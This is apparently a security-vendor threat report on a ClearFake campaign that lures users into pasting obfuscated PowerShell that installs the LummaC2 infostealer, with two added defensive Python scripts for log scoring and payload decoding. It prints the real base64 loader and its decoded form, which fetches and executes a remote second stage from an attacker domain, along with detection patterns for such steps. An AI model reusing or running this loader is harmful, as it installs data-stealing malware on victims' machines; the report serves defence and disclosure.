July 25, 2024
Key Points
In May 2024, ReliaQuest discovered a campaign from the JavaScript framework “ClearFake” that uses new execution techniques: The adversary tricks users into manually copying and executing malicious code in PowerShell. This differs from the typical drive-by downloads frequently observed with ClearFake and other “fake browser update”–associated distribution campaigns, in which the victim is tricked into downloading and executing a malicious payload. This new technique is designed to evade detection by security tools, as it involves the user manually running the malicious PowerShell commands directly, as opposed to being invoked by a script file downloaded and executed by the user. The campaign then deploys a multi-stage malware infection using PowerShell and sandbox evasion techniques that leads to the installation of the LummaC2 infostealer malware.
As this campaign requires users to manually execute PowerShell code themselves, this technique will likely have a lower chance of tricking users. However, it may result in more severe consequences, because successful execution could result in detections and controls being bypassed. Security teams need to be aware of this new execution technique, review current controls to restrict PowerShell use, and educate users to not copy and paste code into the PowerShell or Windows Command Shell consoles.
In this report, we will break down the stages of this latest ClearFake campaign, delve into the use cases we observed, and provide mitigations that organizations can implement to protect against this emerging threat.
ClearFake is a JavaScript framework known to use drive-by downloads and social engineering techniques, often presenting fake “browser update” pages to users.
These attacks work by driving traffic to websites that mimic legitimate ones, then presenting users with a page claiming that they need to perform a browser update to view the site’s content.
The goal is typically to get users to download malicious files, leading to data theft or deployment of further malware.
On May 26, 2024, we first identified attacks on our customer base that began with users visiting a compromised website hosting a fake browser error prompt that asks the user to install a root certificate to fix the issue. The websites we observed in these incidents belonged to legitimate businesses that were likely compromised through vulnerabilities allowing code to be injected. The error prompt instructs the user to manually execute malicious PowerShell code, which subsequently installs LummaC2 (see Figure 1).
Figure 1: Attack flow
The prompt on the compromised sites indicates that the content cannot be displayed properly and instructs users to install a “root certificate” to resolve the issue by clicking a “Fix it” button (see Figure 2).
Figure 2: First fake update prompt
After clicking “How to fix,” another prompt appears that contains instructions for installing the root certificate. The message features a “copy” button that, when clicked, copies obfuscated malicious PowerShell code into the user’s clipboard (see Figure 3). Next, the user is guided through several steps to open a PowerShell terminal and paste in the code, which then automatically executes.
This stage—tricking the user into running the malicious PowerShell manually—is the noteworthy aspect of this campaign. The method bypasses signatures and detections that rely on suspicious parent–child process relationships, malicious file downloads, and Mark-of-the-Web signatures: the user opens the console from explorer.exe, so the initial PowerShell execution has no suspicious parent process and no preceding command line to alert on.
Figure 3: Second fake update prompt
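The detection gap described above is what makes script block logging the key telemetry here: process creation looks like an ordinary interactive PowerShell session, but PowerShell Script Block Logging (Event ID 4104) records every block it compiles, including the decoded text later handed to Invoke-Expression. The following Python script is an added example, not ReliaQuest's code or one of its detection rules; it scores constructed 4104-style records for the combination of traits shown in this campaign (base64 decoding, Invoke-Expression, a web download, a clipboard wipe, a DNS cache flush) and flags blocks that were typed or pasted into a console with no backing script file. The indicator weights, the alert threshold and the sample records are assumptions for illustration.

```python
"""
Added example (not ReliaQuest's code): scoring PowerShell script-block log
records (Event ID 4104) for the paste-and-run pattern described above.

Because the user opens the console from explorer.exe and pastes the code,
process-creation telemetry looks benign; the script text itself is the
signal. Script block logging captures every block PowerShell compiles,
including the decoded text that Invoke-Expression later runs, so the
inner stage is logged as well. All records below are constructed samples.
"""
import re
from dataclasses import dataclass

# Each indicator is (name, regex, weight). Weights are an assumption for
# illustration; tune them against a baseline of legitimate admin activity.
INDICATORS = [
    ("base64_decode", re.compile(r"FromBase64String", re.I), 2),
    ("invoke_expression", re.compile(r"\b(Invoke-Expression|IEX)\b", re.I), 2),
    ("web_download", re.compile(r"\b(Invoke-WebRequest|IWR|Net\.WebClient|DownloadString)\b", re.I), 2),
    ("clipboard_wipe", re.compile(r"Set-Clipboard\s+-Value\s+['\"]\s*['\"]", re.I), 3),
    ("flush_dns", re.compile(r"ipconfig\s+/flushdns", re.I), 1),
    ("custom_user_agent", re.compile(r"['\"]User-Agent['\"]\s*=", re.I), 1),
    ("clear_host", re.compile(r"\bclear-host\b", re.I), 1),
]
ALERT_THRESHOLD = 5  # assumed threshold for illustration


@dataclass
class ScriptBlockEvent:
    record_id: int
    user: str
    host_app: str      # e.g. ConsoleHost when typed or pasted interactively
    path: str          # script file path; empty for console input
    script_text: str


def score_event(ev: ScriptBlockEvent) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one 4104 record."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(ev.script_text)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # Console input with no backing file is exactly what this campaign
    # relies on: a pasted block never has a script path.
    if ev.host_app == "ConsoleHost" and not ev.path and score > 0:
        score += 1
        hits.append("interactive_no_path")
    return score, hits


def find_alerts(events):
    """Records whose score reaches the threshold, as (id, score, hits)."""
    return [(ev.record_id, s, h) for ev in events
            for s, h in [score_event(ev)] if s >= ALERT_THRESHOLD]


# Constructed sample records (not real telemetry). URLs use reserved
# example domains only.
SAMPLE_EVENTS = [
    ScriptBlockEvent(1, "corp\\jdoe", "ConsoleHost", "",
        "ipconfig /flushdns\n"
        "$a = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QUJD'));\n"
        "$b = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('REVG'));\n"
        "Invoke-Expression ($a + '; ' + $b); exit;"),
    ScriptBlockEvent(2, "corp\\jdoe", "ConsoleHost", "",
        "$h = @{ 'User-Agent' = 'Mozilla/5.0' }\n"
        "$r = Invoke-WebRequest -Uri 'https://example.invalid/df/tt' -UseBasicParsing -Headers $h\n"
        "IEX ([System.Text.Encoding]::UTF8.GetString($r.Content))\nclear-host; Set-Clipboard -Value ' ';"),
    ScriptBlockEvent(3, "corp\\admin", "ConsoleHost", "",
        "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\temp\\svc.csv"),
    ScriptBlockEvent(4, "corp\\build", "ConsoleHost", "C:\\ci\\deploy.ps1",
        "$r = Invoke-WebRequest -Uri 'https://artifacts.example.invalid/app.zip' -OutFile app.zip"),
]

if __name__ == "__main__":
    for rid, s, h in find_alerts(SAMPLE_EVENTS):
        print(f"record {rid}: score {s} -> {', '.join(h)}")
```

Record 1 is the outer pasted block and record 2 the decoded inner stage that Invoke-Expression runs; both alert, while the admin one-liner (record 3) and a CI download backed by a script file (record 4) stay below the threshold. In production the same logic would read 4104 events from the Microsoft-Windows-PowerShell/Operational channel, which requires script block logging to be enabled by policy.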
In each instance, the PowerShell code copied by the user was obfuscated using base64 encoding. Decoding the base64 reveals malicious PowerShell code:
ipconfig /flushdns
$VBrowser = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("JGpvYiA9IFN0YXJ0LUpvYiAtU2NyaXB0QmxvY2sgewogICAgQWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uV2luZG93cy5Gb3JtcwogICAgW1N5c3RlbS5XaW5kb3dzLkZvcm1zLk1lc3NhZ2VCb3hdOjpTaG93KCJUaGUgb3BlcmF0aW9uIGNvbXBsZXRlZCBzdWNjZXNzZnVsbHksIHBsZWFzZSByZWxvYWQgdGhlIHBhZ2UiLCAiU3lzdGVtIiwgMCwgNjQpCn0KCiRnOTFGID0gJ2h0dHBzOi8vcnRhdHRhY2suYmFxZWJlaTEub25saW5lL2RmL3R0JwokdjM4SyA9IEB7ICdVc2VyLUFnZW50JyA9ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTAyLjAuMC4wIFNhZmFyaS81MzcuMzYnIH0KJHowNFEgPSBJbnZva2UtV2ViUmVxdWVzdCAtVXJpICRnOTFGIC1Vc2VCYXNpY1BhcnNpbmcgLUhlYWRlcnMgJHYzOEsKCklFWCAoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJHowNFEuQ29udGVudCkpCgpjbGVhci1ob3N0Owo="));
$Update = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw=="));
$VER = $VBrowser + "; " + $Update;
Invoke-Expression $VER;
exit;
# Decoded contents of $VBrowser (URL defanged; the live string uses https and a plain dot):
$job = Start-Job -ScriptBlock {
    # Background job shows a reassuring dialog so the user believes the "fix" worked
    Add-Type -AssemblyName System.Windows.Forms
    [System.Windows.Forms.MessageBox]::Show("The operation completed successfully, please reload the page", "System", 0, 64)
}
$g91F = 'hxxps://rtattack.baqebei1[dot]online/df/tt'
# The server only answers requests carrying this exact User-Agent
$v38K = @{ 'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36' }
$z04Q = Invoke-WebRequest -Uri $g91F -UseBasicParsing -Headers $v38K
# Second-stage script is executed straight from the response body
IEX ([System.Text.Encoding]::UTF8.GetString($z04Q.Content))
clear-host;
# Decoded contents of $Update: overwrites the clipboard so the pasted code is no longer there
Set-Clipboard -Value " ";
When pasted into the PowerShell terminal, the code runs through the execution chain described below:
When the PowerShell script is executed, the attacker-controlled domain conducts a user agent check. If the correct user agent is supplied, a second PowerShell script is downloaded. The PowerShell script checks the infected device’s CPU temperature, and, if the result is null, execution is terminated. The CPU temperature check is a form of sandbox evasion since virtual machines will not return a value. If a CPU temperature value is returned, execution continues and a ZIP file is downloaded from the domain “cdnforfiles[.]xyz.” The ZIP file contains the legitimate “MediaInfo.exe” file and the malicious DLL “MediaInfo_i386.dll.” The PowerShell script executes any files with a “.exe” extension, which subsequently executes MediaInfo.exe and the malicious DLL via DLL sideloading. Upon successful execution, LummaC2 is installed as an executable file.
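To triage a pasted payload like the one above without running it, an analyst can unwrap the FromBase64String literals statically and pull the indicators out of each layer. The following Python decoder is an added example, not ReliaQuest's tooling; it recurses through nested base64 layers, strips the whitespace that copy-and-paste or page extraction inserts into long strings, and reports URLs and User-Agent values in defanged form so they can go straight into a ticket. The sample payload is constructed inside the script from a harmless inner stage that points at a reserved example domain, mirroring the structure of the observed code rather than reproducing it.

```python
"""
Added example (not ReliaQuest's code): unwrapping the layered base64
clipboard payload and extracting indicators from it for triage.

The observed stage wraps its real script in one or more
[System.Convert]::FromBase64String("...") literals that are decoded and
handed to Invoke-Expression at run time. This decoder does the decoding
statically, recursing until no further base64 literals are found, and
reports URLs and User-Agent strings in defanged form. The payload below
is constructed from a harmless inner script pointing at a reserved
example domain.
"""
import base64
import re

B64_LITERAL = re.compile(
    r"FromBase64String\s*\(\s*[\"']([A-Za-z0-9+/=\s]+)[\"']\s*\)", re.I)
URL = re.compile(r"https?://[^\s\"'()]+", re.I)
USER_AGENT = re.compile(r"[\"']User-Agent[\"']\s*=\s*[\"']([^\"']+)[\"']", re.I)


def defang(url: str) -> str:
    """Rewrite to hxxp://host[.]tld/path so the value is not clickable."""
    url = re.sub(r"^http", "hxxp", url, flags=re.I)
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    host = "[.]".join(host.rsplit(".", 1))
    return f"{scheme}://{host}{slash}{path}"


def unwrap(script: str, max_depth: int = 5) -> list[str]:
    """Return every decoded layer, outermost first, without executing anything."""
    layers = [script]
    frontier = [script]
    for _ in range(max_depth):
        nxt = []
        for text in frontier:
            for m in B64_LITERAL.finditer(text):
                blob = re.sub(r"\s+", "", m.group(1))  # drop wrap-inserted whitespace
                try:
                    decoded = base64.b64decode(blob, validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue  # not a real base64 literal; skip it
                nxt.append(decoded)
        if not nxt:
            break
        layers.extend(nxt)
        frontier = nxt
    return layers


def extract_iocs(script: str) -> dict:
    """Decode all layers and summarise what the payload reaches out to."""
    layers = unwrap(script)
    joined = "\n".join(layers)
    return {
        "layers": len(layers),
        "urls": sorted({defang(u) for u in URL.findall(joined)}),
        "user_agents": sorted(set(USER_AGENT.findall(joined))),
        "invokes_expression": bool(re.search(r"\b(Invoke-Expression|IEX)\b", joined, re.I)),
    }


# --- constructed sample, mirroring the structure of the observed stage ---
INNER = (
    "$job = Start-Job -ScriptBlock { Add-Type -AssemblyName System.Windows.Forms }\n"
    "$g = 'https://stage.example.invalid/df/tt'\n"
    "$h = @{ 'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' }\n"
    "$r = Invoke-WebRequest -Uri $g -UseBasicParsing -Headers $h\n"
    "IEX ([System.Text.Encoding]::UTF8.GetString($r.Content))\n")
CLIP = "Set-Clipboard -Value \" \";"


def b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


SAMPLE_PAYLOAD = (
    "ipconfig /flushdns\n"
    f'$VBrowser = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("{b64(INNER)}"));\n'
    f'$Update = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("{b64(CLIP)}"));\n'
    '$VER = $VBrowser + "; " + $Update;\nInvoke-Expression $VER;\nexit;\n')

if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_PAYLOAD).items():
        print(f"{key}: {value}")
```

Because the decoder never evaluates the script, it is safe to run on a real clipboard capture; the second-stage script that the inner layer downloads is not on the analyst's machine and would have to be retrieved separately through a sandbox or proxy capture.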
In this section, we explore two case studies ReliaQuest observed as part of the new ClearFake campaign.
A user visited an infected website that referenced the attacker-controlled domain “d1x9q8w2e4[.]xyz” to produce the fake update prompt. The user copied the malicious PowerShell code into the PowerShell console and executed it. The second stage download attempt was blocked by technical controls, preventing any traffic to the second domain “rtattack.baqebei1[dot]online,” thereby preventing further infection.
ReliaQuest detected the download attempt and proactively blocked the hash value of the next PowerShell file intended for download. The organization permits PowerShell execution on the user’s host, which enabled the user to copy, paste, and execute the malicious code. Technical controls stopped the second download stage; however, further restricting the user’s access to PowerShell and making the user aware of the threat could have prevented the initial execution.
A user visited an infected website referencing the attacker-controlled domain “dnforfiles[.]xyz” to inject the update prompt. The user followed the instructions to copy and paste the malicious PowerShell code into a console. The following infection chain occurred successfully:
ReliaQuest detected the LummaC2 malware and performed triage of the incident. The ReliaQuest technical operations team used GreyMatter Respond to ban the hash values of the malicious files and block the attacker-controlled domains and IP addresses. We recommended that the organization perform a full wipe and re-image of the infected host from a known good backup to remove any persistence gained by the malware, and change the impacted user’s credentials as a precaution. This case study provides further evidence of the importance of restricting users from executing applications such as PowerShell and limiting PowerShell execution to where it is necessary. If implemented, network controls blocking connections to the anomalous top-level domain “.xyz” could have prevented further infection.
To identify malicious activity associated with ClearFake, ReliaQuest offers detection rules to customers. Associated GreyMatter Respond Plays can be executed to perform remediation, either by ReliaQuest customers or on their behalf by the ReliaQuest team.
In addition to the detection rules cited above, we offer the following general recommendations and best practices to protect against the campaign detailed in this report.
The below IoCs have been proactively added to the GreyMatter Intel feed for ReliaQuest customers.
Hashes
Attacker-Controlled Domains
Attacker-Controlled IP Addresses
Infected Websites